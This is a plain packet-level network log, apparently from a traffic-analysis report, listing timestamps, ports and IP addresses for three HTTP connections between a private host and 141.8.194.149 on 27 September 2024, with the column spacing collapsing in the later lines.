Sep 27, 2024 08:43:22.066562891 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:22.066576958 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:22.066591978 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:22.066642046 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:22.066642046 CEST    49718    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:43:22.066654921 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:22.066668034 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:22.066679001 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:22.066689014 CEST    49718    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:43:22.066715956 CEST    49718    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:43:22.067501068 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:22.067512989 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:22.067543983 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:22.067553997 CEST    49718    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:43:22.067555904 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:22.067574024 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:22.067579985 CEST    49718    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:43:22.067585945 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:22.067600012 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:22.067626953 CEST    49718    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:43:22.067646980 CEST    49718    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:43:22.068392992 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:22.068417072 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:22.068428040 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:22.068463087 CEST    49718    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:43:22.068510056 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:22.068521976 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:22.068533897 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:22.068546057 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:22.068553925 CEST    49718    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:43:22.068587065 CEST    49718    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:43:22.069343090 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:22.069355011 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:22.069366932 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:22.069377899 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:22.069390059 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:22.069391966 CEST    49718    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:43:22.069401979 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:22.069407940 CEST    49718    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:43:22.069417000 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:22.069444895 CEST    49718    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:43:22.069469929 CEST    49718    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:43:22.070163012 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:22.070184946 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:22.070203066 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:22.070214033 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:22.070225000 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:22.070234060 CEST    49718    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:43:22.070238113 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:22.070245981 CEST    49718    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:43:22.070251942 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:22.070278883 CEST    49718    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:43:22.070997953 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:22.071021080 CEST    80    49718    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:22.071059942 CEST    49718    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:43:22.072599888 CEST    49718    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:43:35.260380983 CEST    49719    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:43:35.265382051 CEST    80    49719    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:35.265465021 CEST    49719    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:43:35.265680075 CEST    49719    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:43:35.270406008 CEST    80    49719    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:36.033165932 CEST    80    49719    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:36.033195019 CEST    80    49719    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:36.033206940 CEST    80    49719    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:36.033217907 CEST    80    49719    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:36.033229113 CEST    80    49719    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:36.033241034 CEST    80    49719    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:36.033252001 CEST    80    49719    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:36.033260107 CEST    49719    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:43:36.033263922 CEST    80    49719    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:36.033274889 CEST    80    49719    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:36.033288002 CEST    80    49719    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:36.033299923 CEST    80    49719    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:36.033308029 CEST    49719    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:43:36.033332109 CEST    49719    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:43:36.038064003 CEST    80    49719    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:36.038077116 CEST    80    49719    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:36.038145065 CEST    49719    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:43:36.060461044 CEST    80    49719    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:36.060473919 CEST    80    49719    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:36.060484886 CEST    80    49719    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:36.060523987 CEST    49719    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:43:36.060537100 CEST    49719    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:43:36.060664892 CEST    80    49719    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:36.060677052 CEST    80    49719    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:36.060688019 CEST    80    49719    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:36.060713053 CEST    49719    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:43:36.061049938 CEST    80    49719    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:36.061100960 CEST    49719    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:43:36.061105013 CEST    80    49719    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:36.061121941 CEST    80    49719    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:36.061134100 CEST    80    49719    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:36.061144114 CEST    80    49719    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:36.061165094 CEST    49719    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:43:36.061182976 CEST    49719    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:43:36.061846972 CEST    80    49719    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:36.061856985 CEST    80    49719    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:36.061882973 CEST    80    49719    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:36.061893940 CEST    80    49719    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:36.061894894 CEST    49719    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:43:36.061906099 CEST    80    49719    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:36.061932087 CEST    49719    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:43:36.062697887 CEST    80    49719    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:36.062716007 CEST    80    49719    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:36.062743902 CEST    49719    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:43:36.065294027 CEST    80    49719    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:36.065344095 CEST    49719    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:43:36.065346956 CEST    80    49719    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:36.065357924 CEST    80    49719    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:36.065370083 CEST    80    49719    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:36.065398932 CEST    49719    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:43:36.065643072 CEST    80    49719    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:36.065690041 CEST    49719    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:43:36.065716028 CEST    80    49719    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:36.066031933 CEST    80    49719    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:36.066051960 CEST    80    49719    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:36.066068888 CEST    49719    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:43:36.115433931 CEST    49719    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:43:36.179591894 CEST    80    49719    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:36.179617882 CEST    80    49719    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:36.179636955 CEST    80    49719    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:36.179646969 CEST    80    49719    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:36.179658890 CEST    80    49719    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:36.179671049 CEST    49719    80    192.168.2.9    141.8.194.149
Sep 27, 2024 08:43:36.179683924 CEST    80    49719    141.8.194.149    192.168.2.9
Sep 27, 2024 08:43:36.179702044 CEST    80    49719    141.8.194.149    192.168.2.9
                                  Sep 27, 2024 08:43:36.179709911 CEST4971980192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:36.179712057 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.179723978 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.179730892 CEST4971980192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:36.179735899 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.179759979 CEST4971980192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:36.179781914 CEST4971980192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:36.179922104 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.179932117 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.179992914 CEST4971980192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:36.182079077 CEST4971980192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:36.186887026 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.391685009 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.391711950 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.391721964 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.391733885 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.391746044 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.391757011 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.391768932 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.391777992 CEST4971980192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:36.391815901 CEST4971980192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:36.392087936 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.392100096 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.392111063 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.392141104 CEST4971980192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:36.392141104 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.392153025 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.392155886 CEST4971980192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:36.392188072 CEST4971980192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:36.392451048 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.392461061 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.392471075 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.392497063 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.392508984 CEST4971980192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:36.392508984 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.392519951 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.392548084 CEST4971980192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:36.392570019 CEST4971980192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:36.392952919 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.392963886 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.392975092 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.393004894 CEST4971980192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:36.393043995 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.393054008 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.393065929 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.393102884 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.393105030 CEST4971980192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:36.393115997 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.393125057 CEST4971980192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:36.393126965 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.393138885 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.393152952 CEST4971980192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:36.393187046 CEST4971980192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:36.393836975 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.393939018 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.393949986 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.393959999 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.393970013 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.393980980 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.394004107 CEST4971980192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:36.394006968 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.394017935 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.394027948 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.394031048 CEST4971980192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:36.394040108 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.394068003 CEST4971980192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:36.394143105 CEST4971980192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:36.394743919 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.394756079 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.394767046 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.394812107 CEST4971980192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:36.394833088 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.394844055 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.394855022 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.394866943 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.394877911 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.394897938 CEST4971980192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:36.394917965 CEST4971980192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:36.394922972 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.394933939 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.394990921 CEST4971980192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:36.395643950 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.395654917 CEST8049719141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:36.395705938 CEST4971980192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:36.397444963 CEST4971980192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:53.148085117 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:53.153142929 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:53.153240919 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:53.153426886 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:53.158188105 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:53.823070049 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:53.823097944 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:53.823116064 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:53.823132992 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:53.823148012 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:53.823162079 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:53.823178053 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:53.823200941 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:53.823199034 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:53.823199034 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:53.823216915 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:53.823234081 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:53.823319912 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:53.823321104 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:53.823321104 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:53.828172922 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:53.828188896 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:53.828203917 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:53.828218937 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:53.828274012 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:53.937751055 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:53.937789917 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:53.937824965 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:53.937855959 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:53.937881947 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:53.937989950 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:53.942512035 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:53.942562103 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:53.942595005 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:53.942621946 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:53.942646027 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:53.942676067 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:53.942734003 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:53.947236061 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:53.947268963 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:53.947307110 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:53.947318077 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:53.947351933 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:53.947401047 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:53.947407007 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:53.947439909 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:53.952008009 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:53.952059984 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:53.952091932 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:53.952119112 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:53.952124119 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:53.952328920 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:53.956758022 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:53.956790924 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:53.956841946 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:53.956873894 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:53.956895113 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:53.956906080 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:53.956932068 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:53.961448908 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:53.961466074 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:53.961529016 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:54.052088976 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.052130938 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.052145958 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.052161932 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.052387953 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.052392960 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:54.052392960 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:54.052402973 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.052418947 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.052501917 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:54.052768946 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.052792072 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.052807093 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.052820921 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.052836895 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.052849054 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:54.052884102 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:54.138927937 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.156132936 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:54.163352013 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.365571022 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.365636110 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.365667105 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.365700006 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.365711927 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:54.365734100 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.365766048 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.365787029 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:54.365814924 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.365816116 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:54.366357088 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.366406918 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:54.366460085 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.366493940 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.366527081 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.366547108 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:54.366559982 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.366729975 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:54.367120028 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.367170095 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.367203951 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.367228031 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:54.367235899 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.367269993 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.367304087 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.367335081 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:54.367358923 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:54.367979050 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.368029118 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.368063927 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.368096113 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.368118048 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:54.368141890 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.368155956 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:54.368176937 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.368417978 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:54.368937016 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.368987083 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.369024992 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.369055033 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:54.369056940 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.369090080 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.369124889 CEST8049720141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:43:54.369127035 CEST4972080192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:43:54.369184971 CEST4972080192.168.2.9141.8.194.149
